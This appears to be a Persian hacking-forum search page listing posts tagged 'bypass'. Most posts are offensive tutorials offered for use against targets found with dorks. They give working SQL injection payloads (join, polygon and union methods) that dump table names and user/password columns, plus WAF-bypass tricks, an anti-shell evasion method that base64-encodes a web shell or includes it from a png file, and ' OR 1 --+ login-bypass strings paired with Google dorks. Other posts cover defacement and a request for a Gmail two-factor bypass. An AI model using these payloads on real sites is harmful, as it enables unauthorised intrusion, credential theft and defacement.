جستجو در تالارهای گفتگو
در حال نمایش نتایج برای برچسب های 'بایپس'.
20 نتیجه پیدا شد
-
اصطلاحات هک و امنیت
Zed پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
× حفره امنیتی و یا همان باگ چیست ؟ » به نقص ها و سهل انگاری های برنامه نویسان، طراحان وب سایت ها، در کارهای خود به جای میگذارند، نفوذگر آنها را پیدا کرده و از طریق این حفره ها اقدام به نفوذ میکند را باگ می گویند ! × تارگت چیست ؟ » معنی اصلی این کلمه یعنی هدفی که از قبل تعیین شده، به طور مثال نفوذگر پس از جمع آوری کامل اطلاعات از یک وب سایت فهمیده است که این وب سایت حفره امنیتی دارد و میتواند از طریق این حفره ها و باگ ها اقدام به نفوذ کند و آن را هدف و یا تارگت خود قرار میدهد ! × اکسپلویت چیست ؟ » به یکسری کد های مخرب که توسط مهاجم و یا همان نفوذگر نوشته میشود را اکسپلویت می نامند. × پیلود چیست ؟ » به یکسری کد های مخرب وظیفه انتقال پکتهای ارتباطی بین دو کامپیوتر یا چندبن کامپیوتر به صورت غیر مجاز را دارند پیلود میگویند. × کیلاگر چیست ؟ » نرم افرار و یا برنامه ای برای دسترسی به تمامی کلمات و یا حروفی که بر روی صفحه کلید تارگت تایپ میشود را ذخیره و برای نفوذگر ارسال میشود،این کلمات میتوان از انواع آدرس ها مانند حساب های بانکی، پسورد ها و را در نظر گرفت ! × بایپس چیست ؟ » به معنای دور زدن هست یعنی هکر با روش های خاصی موانع امنیتی را دور میزند ! × کلاینت چیست ؟ » سیستم های که از یک سرور خدمات دریافت میکنند را کلاینت های می نامند، برای مثال شما یک کلاینت هستید ! × شل چیست ؟ » در هک هنگامی که هکر با استفاده از ابزارها و کارهای خود میتونه به سیستم قربانی نفوذ کنه و کنترل سیستم رو بدست بگیره اصطلاحا میگن شل گرفته و میتونه تصمیمات خودش رو عملی کنه ! × دیفیس چیست ؟ » وقتی یه هکر سایتی رو هک میکنه ، نمای صفحه اصلی (یا بقیه صفحه های) سایت رو تغییر میده و ممکنه اسم خودش رو هم درج کنه و مسئولیت هک سایت رو بپذیره به این صفحه دیفیس پیج میگویند ! × مس دیفیس چیست ؟ » مس دیفیس هم مثل همون دیفیس هست با این فرق که شما وقتی تمام سایت های متعلق به یک سرور خاص رو دیفیس کنید میگویند مس دیفیس انجام داده اید ! × بک دور چیست ؟ » در هک وقتی یه هکر به سیستمی نفوذ کرد عمدا راه دومی برای نفوذهای بعدی در سیستم هک شده قرار میده تا اگه یوقت احیانا راه نفوذ فعلی شناسایی و بسته شد بتونه با کمک در پشتی که ایجاد کرده دوباره نفوذ کنه ! هماهنگ شده با ادمین عزیز @proxy-
- اصطلاحات هک و امنیت
- تارگت
- (و 19 مورد دیگر)
-
کسی بایپس تایید دو مرحله ای جیمیل داره؟
err0r404 پاسخی ارسال کرد برای یک موضوع در سوال و جواب های امنیت ایمیل های شخصی
سلام دوستان یه سوال داشتم کسی بایپس تایید دو مرحله ای جیمیل رو داره؟ چندتا پیدا کردم ولی مال سال ۲۰۱۸ یا ۲۰۱۷ بودن و برای ۲۰۲۰ جواب نمیدادن.اگه کسی بایپسش رو بلده بگه ممنون. -
با سلام خدمت کاربران و مدیران سایت گارد ایران در این تاپیک قصد دارم به شما آموزش دور زدن آنتی شل رو بدم که شاید بیشتر جاها بدردتون بخوره . روش اول : دو بار encode کردن شل با base64 که می توانید از این سایت کمک بگیرید . --------------- روش دوم : شل رو به فرمت png تغییر دهید . یک فایل دیگر با فرمت php بسازید و این کد رو در اون قرار دهید : <?php include_once("shell.png"); ?> تا سایت اون فایل رو با فرمت php بخونه . --------------- پیشنهاد می کنم هر دو روش رو در کنار هم انجام دهید تا انتی شلر بهتر بایپس شود . امیدوارم از این تاپیک لذت برده باشید و بدردتون بخوره و تاپیک خوبی رو گذاشته باشم .
- 1 پاسخ
-
- shell
- anti shell
-
(و 11 مورد دیگر)
برچسب زده شده با :
-
با سلام خدمت کاربران و مدیران عزیز گارد ایران توضیح مختصر در رابطه با جداول (table) تیبل های سیستمی : تیبل هایی که بیشتر مواقع با حروف بزرگ هستند و زیاد به کار ما نمیان . تیبل های user یا کاربری : تیبل هایی که ما با آنها کار داریم و بیشتر مواقع با حروف کوچک هستند . ما قبلا برای محدود سازی از این روش استفاده می کردیم : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+table_schema=database()-- و حالا در محدود سازی که می خواهم به شما آموزش دهم url به این طریق می شود : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+ascii(substring((table_name),1,1))>97-- و دارید می گویید که تمام تیبل هایی را که حرف های شان از عدد 97 (a) بیشتر است نمایش بده که اعداد بیشتر از 97 در کدگذاری ascii حروف کوچک هستند. برای اینکه بگویید تیبل هایی که حرف دوم آن ها کوچک است را برسی کند : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+ascii(substring((table_name),2,1))>97-- نکته : در این روش از کدگذاری ascii استفاده شده که عدد 97 به معنای a کوچک است . امیدوارم لذت برده باشید تشکر فراموش نشه 😅
-
- sql injection
- bug
-
(و 13 مورد دیگر)
برچسب زده شده با :
-
بایپس نشان ندادن ستون آسیب پذیر اگر بایپس هایی مثل null کردن را انجام دادید و نتیجه نداد باید از Having استفاده کنید . نوع having ها : Having null Having false Having 0 Having 1 like 0 Having 1 limit 0 به این صورت : ......?id=1+<having>+union+select+1,2,3,4,5,6,7,8,9 در جایی که نوشته شده <having> باید نوع having را بنویسید . مثال : .....?id=2 having null+union+select+1,2,3,4,5,6,7,8,9-- تمام having ها را انجام دهید تا به نتیجه برسید . امیدوارم لذت برده باشید . 💙 فراموش نشه 😍
-
- sql injection
- sqli
-
(و 20 مورد دیگر)
برچسب زده شده با :
-
با سلام همانطور که در آموزش متد join در sql injection گفتم چند نکته در رابطه با متد join هست که باید بگویم که در این پست قرار است این نکات رو شرح بدم . در بعضی از تارگت ها ممکن است زمان محدود سازی سایت به = حساس باشد : union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ پس شما باید از این دستور استفاده کنید : site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+group_concat(table_name)+from+information_schema.tables+where+table_schema+like+’dbname’)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 به جای dbname نام دیتابیس مورد نظر را بزنید (در بین دو کتیشن ) و اگر با مشکل مواجه شدید دو کتیشن را حذف کنید و نام دیتابیس را بصورت hex بنویسید . ------------------------------ برای بدست آوردن نام دیتابیس در متد join از این دستور استفاده کنید : site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+database())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 ------------------------------ امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و متد join رو به خوبی یاد گرفته باشید . هر گونه سوال در مورد پست داشتید در قسمت پرسش و پاسخ بپرسید . ************ MR.MSA ************ <آموزش متد polygon در sql injection > < آموزش متد join در sql injection > <دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ کالی لینوکس> <دانلود نسخه های ۲۰۱۶ و ۲۰۱۷ کالی لینوکس> <دانلود نسخه های ۱ تا ۲ کالی لینوکس >
-
- method
- method sql injection
-
(و 27 مورد دیگر)
برچسب زده شده با :
- method
- method sql injection
- sql
- sql injection
- bug
- web hacking
- site
- bypass
- bypass sql injection
- bypass sql
- نکته مهم در متد join
- متد join در sql injection
- mr.msa
- هک
- هک سایت
- وب هکینگ
- باگ
- بایپس
- بایپس sql injecion
- متد
- متد sql injection
- متد join
- دیتابیس هکینگ
- دیتابیس
- دیتابیس mysql
- mysql
- database hacking
- database mysql
- database attack
-
با سلام خدمت کاربران و مدیران انجمن گارد ایران من MR.MSA در این پست قصد دارم متد polygon رو به شما آموزش بدهم . ------------------------------------ یکی از کاربرد های متد polygon زمانی است که : در یک تارگت order+by و ... را زدید و تعداد تیبل ها را بدست اوردید و بعد خواستید تیبل ها را بیرون بکشید و با خطای error different number of columns مواجه شدید می توانید از متد polygon استفاده کنید . یکی دیگر از کاربرد های متد polygon زمانی است که : با خطای Unknown column “language’ in ‘field list’ مواجه می شوید می توانید از متد polygon استفاده کنید . ------------------------------------ سطح متد : حرفه ای ------------------------------------ روش استفاده از متد polygon : ابتدا مقدار را پاک کنید : site.com/news.php?id=1 ( نکته : در سایت های که مثلا دو مقدار است آن مقدار را پاک می کنید که اسیب پذیر است و بعد مراحل را پیش می روید . ) -------------- سپس این عبارت را قرار می دهید : [Hidden Content]((select*from(select*from(select@@version)f)x)) و اگر ورژن را به شما نمایش داد یعنی می توانید از متد polygon استفاده کنید . یک جورایی میشه گفت جای که version است ستون آسیب پذیره. -------------- خب حالا می رویم سراغ بیرون کشیدن تیبل ها : site.com/news.php/id=polygon((select*from(select*from(select@@group_concat(table_name) from information_schema.tables where table_schema=database())f)x)) قسمت های بنفش قسمت هایی هستند که تازه اضافه شده اند . توجه داشته باشید که به دلایلی دو (( آخر دستور در جاهای دیگر قرار گرفته اند اما در نگاه به این شکل است ولی زمانی که شما این دستور را کپی کنید و به url تارگت اضافه کنید درست نمایش داده می شود . ( در تمامی دستورات به همین شکل است ، پس نگران نباشید 😁) -------------- (برای مثال تیبل مهمی که بدست می آوریم user است ) و حالا برای بیرون کشیدن ستون های یک جدول : site.com/news.php/id=polygon((select*from(select*from(select@@group_concat(column_name)+from+information_schema.columns+where+table_name=’user’)f)x)) قسمت های بنفش قسمت های جدید هستند و باید به جای user نام تیبل مهم خود را بنویسید(در کتیشن ) اگر با مشکل مواجه شدید دو کتیشن را بردارید و نام تیبل خود را به صورت hex بنویسید . -------------- و می مونه بیرون کشیدن اطلاعات ستون های مهم : site.com.news.php/id=polygon((select*from(select*from(select@@group_concat(user,0x3a,pass) from ‘user’)f)x)) باید به جای user نام تیبل مهم خود را بنویسید(در کتیشن ) و به جای user و pass نام ستون مهم خود را بنویسید . اگر با مشکل مواجه شدید دو کتیشن را بردارید و نام تیبل خود را به صورت hex بنویسید . ------------------------------------ امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و اینکه در متد polygon یک نکته های مونده که باید بگویم برای پیچیده نشدن پست نگفتم و حتما در پست بعدی توضیح می دهم . هر گونه سوال در مورد پست داشتید در قسمت سوال و جواب بپرسید .
-
- دیتابیس
- method sql injection
-
(و 26 مورد دیگر)
برچسب زده شده با :
- دیتابیس
- method sql injection
- method
- آموزش
- bug
- وب هکینگ
- هک سایت
- باگ
- database hacking
- database
- web hacking
- sql injection
- sql
- bypass sql injection
- bypass sql
- bypass
- mr.msa
- متد sql injection
- متد
- بایپس sql
- بایپس sql injecion
- بایپس
- آموزش متد polygon در sql injection
- متد polygon
- mysql
- دیتابیس mysql
- دیتابیس هکینگ
- متد های حرفه ای
-
با سلام خدمت شما کاربران عزیز انجمن گارد ایران در این پست می خواهم متد join رو در باگ sql injection به شما آموزش بدهم . ------------------------ موارد قابل استفاده : ۱- مواجه شدن با خطا زمان استفاده از union select ۲- مواجه شدن با خطای : 'Unknown column ‘activo’ in ‘field list ۳- زمانی که سایت به عدد حساس است . ۴- و.... ------------------------ نکته : در بیشتر سایت هایی که از متد join استفاده می شود سایت به + و یا به فاصله حساس است و شما به جای فاصله باید از /**/ استفاده کنید که من برای راحتی شما عزیزان فایلی را قرار دادم که در متد join به جای فاصله ها از /**/ استفاده شده . ------------------------ نحوه استفاده از متد join : ---------------------------------------- ( برای مثال تعداد تیبل های سایت ۵ تا می باشد. ) مرحله اول بیرون کشیدن ستون آسیب پذیر : +union+select+*from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select 5)e%23+ و همینطور تا اخر یعنی a و b و c باید کنار ( مقدار select ) قرار داشته باشند و مثلا ۱ می شود a و ۲ می شود b و به همین صورت و بین هر کدام یک join زمانی که به اخر رسدید دیگه join نمی خواهد و اینکه در اول باید بنویسید : from * توجه داشته باشید که هر عدد تبدیل شده است به یک سلکت (مقدار عدد ) ، یک حرف و join ---------------------------------------- ( برای مثال در خروجی ستون ۲ را نشان می دهد و ستون ۲ آسیب پذیر است. ) مرحله دوم بدست آوردن ورژن : +union+select+*from (select 1)a+join+(select version())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 ---------------------------------------- مرحله سوم بیرون کشیدن جدول (table) های دیتابیس (و محدود سازی تیبل ها برای نشان ندادن تیبل های سیستمی ) : union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ توجه داشته باشید در بیشتر سایت ها سایت به , حساس است به همین دلیل ما از متد separator برای مرتب سازی تیبل ها و تگ <br> استفاده کردیم و شما در صورت لزوم می توانید آن بخش هایی که بکگراند سفید دارند را حذف کنید . ---------------------------------------- ( برای مثال در بین تیبل ها تیبل msa_users وجود دارد . ) مرحله چهارم بیرون کشیدن ستون های یک تیبل : union+select+*from+(select 1)a+join+(select+group_concat(column_name)+from+information_schema.columns+where+table_name+like+'msa_users')b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ به جای msa_users نام تیبل مهم خود را بنویسید و می توانید برای مرتب سازی ستون ها از متد separator مانند مرحله سوم استفاده کنید . ما از متد like هم استفاده کردیم و اینکه توجه داشته باشید که بیشتر مراحل مثل یونیم بیس هست . ---------------------------------------- ( برای مثال در خروجی ستون های user و pass مهم است . ) مرحله پنجم بیرون کشیدن اطلاعات در ستون های یک تیبل : union+select+*from+(select 1)a+join+(select+group_concat(user using ascii)+from+'msa_users')b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ به جای msa_users نام تیبل مهم خود را بنویسید و به جای user نام ستون مهم خود را بنویسید. می توانید برای مرتب سازی یوزرنیم ها از متد separator مانند مرحله سوم استفاده کنید. و اینکه این یک بار برای یوزرنیم بود و برای پسورد به جای user می نویسید pass ( نام ستون مهم که مربوط به pass است ) ---------------------------------------- امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و اینکه در متد join یک نکته های مونده که باید بگویم برای پیچیده نشدن پست نگفتم و حتما در پست بعدی توضیح می دهم منتظر کامنت های شما هستم . هر گونه سوال در مورد پست داشتید بپرسید . ********* MR.MSA ********** Join method in sql injection.txt
-
- method
- method sql injection
- (و 19 مورد دیگر)
-
آموزش بایپس های SQL از مبتدی تا پیشرفته
parsa2016 پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
بسم الله الرحمن الرحیم با اجازه ی دوستان می خوام تحولی در بایپس ها ایجاد کنم! ( البته با کمک دوستان) می خوام کاملترین آموزش بایپس ها SQL رو از مبتدی تا پیشرفته توی انجمن قرار بدم. انشاالله با کمک دوستان می خواهم جامع ترین تاپیک بایپس های اس کیو ال رو بزنیم. دوستان هم اگه بایپس خاصی رو بلدند حتی اگر priv8 هستش رو توی خصوصی به من بگویند تا توی آموزش ها ازش استفاده بشود. سعی میشه توی آموزشات تمامی بایپس ها توضح داده بشه و بایپسی از زیر دستمون در نره. J همچنین برای هر دستور یک پارت در نظر گرفته شده. (تا بتوانیم به طور جامع به هر دستور بپردازیم.) قوانین رو هم بلدید ، من دیگه متذکر نمیشم. با تشکر.- 11 پاسخ
-
- اموزش هک با SQL
- بایپس
- (و 8 مورد دیگر)
-
درود, آموزش دیفیس(هک) وبسایت با کمک افزونه Noredirect در فایرفاکس سوالی هست زیر همین تاپیک جواب میدم امیدوارم مفید باشه و در راه آموزش استفاده شه! پسورد : guardiran.org Goodzilam.part1.rar Goodzilam.part2.rar
-
سلامی دوباره DANTE هستم اینبار اومدم بایپس یک ارور در باگ sqli یا همون sql injection رو معرفی کنم ممکنه ما تا یک جایی پیش بریم ولی با ارور NOT ACCEPTABLE مواجه بشیم اصلا ماهیت این ارور چیه؟ : این ارور نشون میده که سرور اجرای بعضی کد ها رو قفل کرده که ما میتونیم به دو روش دورش بزنیم روش اول: با نوشتن کد زیر /*!50000your_code*/ و به جای your_code دستور که فکر میکنید بلاک شده است را مینویسین روش دوم: بعضی از حروف دستوری که فکر میکنید اشتباه است را بزرگ بنویسید امیدوارم لذت برده باشید
-
- بایپس های sql
- sql injention
-
(و 3 مورد دیگر)
برچسب زده شده با :
-
معنی هک: هک به معنی سود بردن از یک روش سریع و هوشمندانه برای حل یک مشکل در رایانه میباشد. در علوم مربوط به رایانه معنی هک گاه مساوی معنی کرک (crack) که رمزگشایی است نیز عنوان میشود. در گفتگوهای امروزی هک به معنی نفوذ به یک سیستم رایانهای است؛ و کرک نیز به معنی رمزگشایی است و کراکر (به انگلیسی: Cracker) به فرد گشاینده رمز میگویند. باگ چیست؟ باگ نوعی خطا یا اشتباه در اجرای نرم افزار است که موجب نتایج اشتباه یا اجرا نشدن نرم افزار میشود. علت این اشکالات میتواند اشتباه در هنگام برنامه نویسی باشد. شرکت های سازنده نرم فزارها برای حل این مشکل قبل از ارائه نسخه نهایی نسخههایی تحت نام بتا یا آلفا انتشار میدهند تا افرادی آنها را بررسی کنند و این باگها را گزارش کنند. و هکر میتواند با استفاده از باگ به نرمافزار نفوذ کرده و به هدف خود برسد. شل چیست؟ شل یک ابزار برنامه نویسی شده است که هکر با آپلود کردن اون روی سایت می تواند کارهای مورد نظر خودش رو مانند حذف یا دانلود فایلها و خواندن اطلاعات دیتابیس یا ... رو انجام دهد سی ام اس چیست؟ سی ام اس یا cms سیستم مدیریت محتوا مانند جوملا و وردپرس و..... پورت چیست؟ به راه های ورودی و خروجی اطاعات در سیستم پورت گفته میشه که مانند درهای یک خونه هستند اکسپلویت چیست؟ زمانی که هکر یک باگ رو کشف میکنه برای اینکه بتواند دفعه بعد با سرعت بیشتری نفوذ رو انجام بدهد یک کد مینویسد که عمل نفوذ رو انجام دهد که به آن اکسپلویت گفته می شود. آی پی چیست؟ به آدرس یک سیستم در بستر اینترنت یا شبکه آی پی ip گفته میشود دفیس و مس دفیس چیست؟ زمانی که صفحه سایت مورد نفوذ تغیر پیدا کرد در اصطلاح میگویند که سایت دفیس شده است حال اگر صفحه چند سایت با آی پی های یکسان تغییر پیدا کند میگویند که مس دفیس اتفاق افتاده است بایپس چیست؟ به عبور کردن از موانع بایپس میگویند مانند وقتی به سایتی نفوذ می کنید که safe mode آن فعال هست برای اجرا کردن دستورات خود بر روی شل به مشکل بر می خورید و دلیل آن هم وجود firewall سرور هست . برای اینکه بتوانید دستورات خود را بر روی شل اجرا کنید ولی firewall گیر ندهد باید آن را bypass (دور زدن firewall ) کنید . اگه چیزی رو از قلم انداختم بگید فقط دوستان لطف کنید به چت روم تبدیل نکنید اینجا رو ممنون
-
- دفیس
- ip چیست؟
-
(و 43 مورد دیگر)
برچسب زده شده با :
- دفیس
- ip چیست؟
- آی پی چیست؟
- ip
- آی پی
- اکسپلویت چیست
- اکسپلویت
- پورت
- پورت چیست
- سی ام اس چیست
- cms چیست
- cms
- سی ام اس
- شل چیست
- شل چیست؟
- شل
- هک چیست
- باگ چیست
- باگ
- معنی هک
- هک چیست؟
- آموزش هک
- آموزش
- کلمات هک
- کلمات اختصاصی هک
- هک را از کجا باید آغاز کرد
- هک را از کجا باید آغاز کرد؟
- چگونه هکر شویم؟
- هکر
- چگونه هکر شویم
- از کجا هک را شروع کنیم
- شروع هک
- تازه واردها
- اصطلاحات هک برای تازه واردها
- اصطلاحات هک
- اصطلاح
- هک
- دفیس یعنی چه؟
- دفیس چیست؟
- مس دفیس
- مس دفیس چیست؟
- بایپس
- بایپس چیست؟
- bypass
- bypass چیست؟
-
سلام یک بایپس دیدم گفتم بزارم دوستان هم استفاده کنن برای دوستان مبتدی فیلم هم قرار دادم user:' OR 1 --+ password:' OR 1 --+ dork:inurl:emplogin.php intext:"Employer's Login" dork:inurl:login.php intext:"Employer's Login" امیدوارم مفید باشه دوستانی که به دفیس علاقه دارن بهم پیام بدن bypass.rar
-
سلام . اگر تا به حال قصد هک کردن یک تارگت SQL را داشتید احتمالا با WAF ها برخورد کرده اید که مانع از انجام حملات شما شده اند و شما نیز از حمله به آن سایت دست کشیده اید. در این تاپیک تمام بایپس های WAF را از ریشه یاد خواهید گرفت تا دیگر از حمله به سایتی به خاطر وجود WAF دست نکشید. 1- لطفا اسپم ندید 2- سوالاتتون رو در این قسمت مطرح نکنید
-
سوال: چگونگی bypass و ارسال شل به آپلودر سایت
vahidpour پاسخی ارسال کرد برای یک موضوع در سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
سلام دوستان با استفاده از گوگل دورک میتوان به راحتی آپلودرهای مختلف رو مثل fckeditor به وفور پیدا کرد اما مشکل اینه همشون اجازه ارسال شل ویا فرمت ناشناخته نمیدن و فرمتهای خاص مثل txt رو فقط میشه فرستاد. حال برای bypass چه راهکاری پیشنهاد میدهید؟ معمولا پیشنهاد میشه، فرمت شل را به عکس تبدیل کرد و بعد با ابزارهایی مثل burpsuite یا live http header در هنگام ارسال فرمت فایل را به php تبدیل کرد اما هر چی اجرا میکنم باز پیام فرمت مجاز نیست میده چون اجازه ارسال فرمتهای ناشناخته نمیدهد از htaccess هم نمیتوان استفاده کرد -
بایپس ها ی sql injection ( اموزش sql injention Bypass waf)
icelord پاسخی ارسال کرد برای یک موضوع در باگ های امنیتی
در این تاپیک بایپس های باگ محبوب sql injection رو مطرح می کنیم. لطفا سوالات رو در بخش سوال و جواب مطرح کنید. قبل از قرار دادن آموزش با بنده هماهنگ کنید. تاپیک با مدیر عزیز C0d3!Nj3ct!0N هماهنگ شده- 7 پاسخ
-
- بایپس فاروالfirewall bypass
- اموزش بایپسwaf
- (و 8 مورد دیگر)
-
هک سایت وردپرسی ( هک پسورد سایت)
the-king پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
با سلام با آموزش بدست آوردن پسورد وردپرس همراه هستیم توضیحات : این باگ تنها در وردپرس وجود نداره و در cms های دیگه ای هم وجود داره البته معمولا در ورژن های قدیمی وردپرس وجود داره فقط میمونه کرک که اون کار خودتونه cms Hacking pass.rar-
- هک پسورد ادمین
- نفوذ به پنل ادمین
- (و 7 مورد دیگر)
-
آموزش بایپس Sql injection ( آموزش Bypass فایروال ) - Sql Injection Bypass
Mehran_FLash پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
درود در این قسمت آموزش بایپس bypass در باگ Sql Injection رو براتون اماده کردم . پیشنهاد میکنم این تاپیک رو هم ببینید : تاپیک جامع نفوذ به سایت +فیلم های آموزشی همونطور که می دونید باگ Sql Injection دارای بایپس های زیادی داره و در این فیلم آموزشی هم یکی از آموزشهای خوبشو به شما یاد میدم . یکی از بهترین Bypass های باگ Sql Injection بایپس Union Select هست و توضیحات کامل هست و با دیدن فیلم خیلی از مشکلات شما برای تارگتهای دیگه برطرف میشه . پسورد : guardiran.org موفق باشید bupass2.rar-
- هک فایروال
- آموزش بایپس سرور هکینگ
- (و 8 مورد دیگر)
-
سلام این برنامه خیلی کاربردی هست و به شما در ساخت فایل های htaccess کمک میکنه برای مثال قابلیت های : Bypass safemode Bypass forbiden bypass to read symlink Block ip address حتی ازش به عنوان ابزار امنیتی برای سایت خودتون هم میتونید استفاده کنید. پسورد فایل : guardiran.org لینک دانلود در پست بعدی
- 2 پاسخ
-
- htaccess
- dz-htaccess generator
- (و 8 مورد دیگر)
-
بایپس باگ sql injention ( دستورات بایپس فایروال بایپس firewall)
kingdeface پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
بسیاری از دوستان تارگت آسیب پذیر به باگ Sql Injection پیدا می کنند و بمحض ارور در Order+By بی معطلی تارگت رو میذارن کنار و در این آموزش تصویری به شما آموزش میدم تا چطور بتونید این دستور رو بایپس Bypass کنید و بتونید به کارتون ادامه بدین . پسورد فایل : guardiran.org . Sql Injection Bypass.rar-
- دستورات bypass
- بایپس باگ sql injection
- (و 8 مورد دیگر)